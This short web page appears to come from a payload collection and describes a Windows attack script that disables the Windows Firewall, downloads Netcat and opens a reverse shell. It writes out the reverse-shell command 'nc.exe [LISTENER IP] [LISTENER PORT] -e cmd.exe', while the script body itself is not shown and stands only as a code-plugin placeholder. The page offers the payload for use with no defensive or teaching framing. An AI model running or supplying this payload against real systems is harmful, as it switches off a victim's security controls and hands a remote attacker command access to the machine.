Payload Netcat download and reverse shell

This script will:

  • Disable the Microsoft Windows Firewall
  • Download Netcat
  • Run Netcat mode reverse shell (nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe)

[crayon-6a9d4eeae5482827675190/]